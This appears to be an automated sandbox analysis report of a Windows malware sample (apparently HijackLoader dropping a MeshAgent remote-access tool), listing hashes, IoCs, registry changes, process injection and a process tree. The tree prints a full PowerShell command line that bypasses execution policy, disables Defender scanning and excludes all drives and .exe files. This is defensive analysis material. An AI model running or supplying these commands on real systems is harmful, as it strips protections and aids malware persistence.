Analysis
max time kernel: 92s
max time network: 145s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24-09-2024 17:40
Static task: static1
Behavioral task: behavioral1
Sample: 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe
Resource: win7-20240903-en
General
Target: 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe
Size: 19.0MB
MD5: e664e32eae75f70aca3b95397beb8706
SHA1: ca649ca8a6f15876d56f7a3491f7435f5b0df8ef
SHA256: d8ae46b6adb3b8dcaddaab2adaf4337048e29c1ffd1caccbe22612dad8113402
SHA512: d522171534431ae1cc9c3536845f3404d89cadbd3e8481ac64c5f3b98b16d0625d6619b00e23e579b575dd99498bd43e6d1b6c07da81839337e9897b901f672a
SSDEEP: 393216:ZGbYHohSnaqtvylAjWZ0Xq9YLuxMfCVb2:gbYHPhtvylAjWZ0Xq9YLuxMfCVK
Malware Config
Signatures
Detects MeshAgent payload (1 IoC)
resource | yara_rule
C:\Users\Admin\AppData\Local\naver\naver.exe | family_meshagent
Blocklisted process makes network request (4 IoCs)
flow | pid | process
27 | 1884 | powershell.exe
28 | 1884 | powershell.exe
31 | 1884 | powershell.exe
32 | 1884 | powershell.exe
Command and Scripting Interpreter: PowerShell (signature title taken from the process tree below, where these three PIDs carry this tag)
pid | process
2244 | powershell.exe
2304 | powershell.exe
1644 | powershell.exe
Sets service image path in registry (2 TTPs, 1 IoC)
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\"" | naver.exe
Executes dropped EXE (2 IoCs)
pid | process
3316 | naver.exe
2192 | naver.exe
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops file in System32 directory (64 IoCs)
description | ioc | process
File opened for modification | C:\Windows\System32\dll\msvcrt.pdb | naver.exe
File opened for modification | C:\Windows\System32\ucrtbase.pdb | naver.exe
File opened for modification | C:\Windows\System32\ntasn1.pdb | naver.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys | naver.exe
File opened for modification | C:\Windows\System32\ole32.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\Kernel.Appcore.pdb | naver.exe
File opened for modification | C:\Windows\System32\exe\MeshService64.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\comctl32.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\msvcrt.pdb | naver.exe
File opened for modification | C:\Windows\System32\ws2_32.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\gdi32full.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\crypt32.pdb | naver.exe
File opened for modification | C:\Windows\System32\iphlpapi.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\shell32.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\shell32.pdb | naver.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\System32\dll\shcore.pdb | naver.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\39D8960339E98ED327D3ACF7EF9C1C329EC27809 | naver.exe
File opened for modification | C:\Windows\System32\gdi32.pdb | naver.exe
File opened for modification | C:\Windows\System32\gdi32full.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\dbghelp.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\combase.pdb | naver.exe
File opened for modification | C:\Windows\System32\DLL\dbgcore.pdb | naver.exe
File opened for modification | C:\Windows\System32\DLL\bcrypt.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb | naver.exe
File opened for modification | C:\Windows\System32\shcore.pdb | naver.exe
File opened for modification | C:\Windows\System32\msvcrt.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\win32u.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\gdi32full.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\msvcp_win.pdb | naver.exe
File opened for modification | C:\Windows\System32\sechost.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\ncrypt.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\ntdll.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\rpcrt4.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\dbghelp.pdb | naver.exe
File opened for modification | C:\Windows\System32\bcryptprimitives.pdb | naver.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\System32\MeshService64.pdb | naver.exe
File opened for modification | C:\Windows\System32\comctl32.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\advapi32.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\sechost.pdb | naver.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\328FC4DCB11193B185AE89ACB02AA01BC7434194 | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\combase.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\bcryptprimitives.pdb | naver.exe
File opened for modification | C:\Windows\System32\crypt32.pdb | naver.exe
File opened for modification | C:\Windows\System32\advapi32.pdb | naver.exe
File opened for modification | C:\Windows\System32\dbghelp.pdb | naver.exe
File opened for modification | C:\Windows\System32\DLL\iphlpapi.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\DLL\iphlpapi.pdb | naver.exe
File opened for modification | C:\Windows\System32\combase.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\ncrypt.pdb | naver.exe
File opened for modification | C:\Windows\System32\bcrypt.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\kernelbase.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\ws2_32.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\gdi32.pdb | naver.exe
File opened for modification | C:\Windows\System32\rpcrt4.pdb | naver.exe
File opened for modification | C:\Windows\System32\shell32.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\gdiplus.pdb | naver.exe
File opened for modification | C:\Windows\System32\Kernel.Appcore.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\kernelbase.pdb | naver.exe
File opened for modification | C:\Windows\System32\user32.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\sechost.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\gdiplus.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\ntasn1.pdb | naver.exe
Modifies data under HKEY_USERS (52 IoCs)
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | naver.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | naver.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | naver.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716732718239736" | naver.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | naver.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | naver.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Modifies system certificate store (signature title taken from the process tree below, where PID 780 carries this tag; the certificate blob value was not preserved in the page and is shown as a placeholder)
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = <blob omitted> | 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = <blob omitted> | 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | process
2304 | powershell.exe (listed twice)
1884 | powershell.exe (listed twice)
1260 | msedge.exe (all remaining entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
pid | process | Token: privilege(s)
2304 | powershell.exe | SeDebugPrivilege
1884 | powershell.exe | SeDebugPrivilege
1260 | msedge.exe | SeDebugPrivilege
2928 | chrome.exe | SeDebugPrivilege
1644 | powershell.exe | SeDebugPrivilege
4028 | wmic.exe | SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege (this set of twelve is listed twice)
4336 | wmic.exe | the same twelve privileges as for PID 4028, again listed twice
2132 | wmic.exe | SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege (list cut off at the 64-entry display limit)
Suspicious use of WriteProcessMemory (30 IoCs; each row is listed twice in the original)
description | pid | process | target process
PID 780 wrote to memory of 1884 | 780 | 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe | powershell.exe
PID 780 wrote to memory of 2304 | 780 | 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe | powershell.exe
PID 1884 wrote to memory of 1260 | 1884 | powershell.exe | msedge.exe (listed four times)
PID 1260 wrote to memory of 2928 | 1260 | msedge.exe | chrome.exe (listed four times)
PID 2928 wrote to memory of 1644 | 2928 | chrome.exe | powershell.exe
PID 2928 wrote to memory of 3316 | 2928 | chrome.exe | naver.exe
PID 2192 wrote to memory of 4028 | 2192 | naver.exe | wmic.exe
PID 2192 wrote to memory of 4336 | 2192 | naver.exe | wmic.exe
PID 2192 wrote to memory of 2132 | 2192 | naver.exe | wmic.exe
PID 2192 wrote to memory of 4808 | 2192 | naver.exe | wmic.exe
PID 2192 wrote to memory of 3240 | 2192 | naver.exe | wmic.exe
PID 2192 wrote to memory of 1632 | 2192 | naver.exe | wmic.exe
PID 2192 wrote to memory of 2244 | 2192 | naver.exe | powershell.exe
Processes (indentation shows parent/child depth in the process tree)

C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe"
  PID: 780
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell -
      PID: 1884
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
          PID: 1260
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

            C:\Program Files\Google\Chrome\Application\chrome.exe
              command line: "C:\Program Files\Google\Chrome\Application\chrome.exe"
              PID: 2928
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory

                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  command line: powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
                  PID: 1644
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious use of AdjustPrivilegeToken

                C:\Users\Admin\AppData\Local\naver\naver.exe
                  command line: C:\Users\Admin\AppData\Local\naver\naver.exe -install
                  PID: 3316
                  - Sets service image path in registry
                  - Executes dropped EXE

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
      PID: 2304
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\naver\naver.exe
  command line: "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
  PID: 2192
  - Executes dropped EXE
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory

    C:\Windows\System32\wbem\wmic.exe
      command line: wmic SystemEnclosure get ChassisTypes
      PID: 4028
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\wbem\wmic.exe
      command line: wmic os get oslanguage /FORMAT:LIST
      PID: 4336
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\wbem\wmic.exe
      command line: wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      PID: 2132
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\wbem\wmic.exe
      command line: wmic os get oslanguage /FORMAT:LIST
      PID: 4808

    C:\Windows\System32\wbem\wmic.exe
      command line: wmic SystemEnclosure get ChassisTypes
      PID: 3240

    C:\Windows\System32\wbem\wmic.exe
      command line: wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      PID: 1632

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell -noprofile -nologo -command -
      PID: 2244
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15
Downloads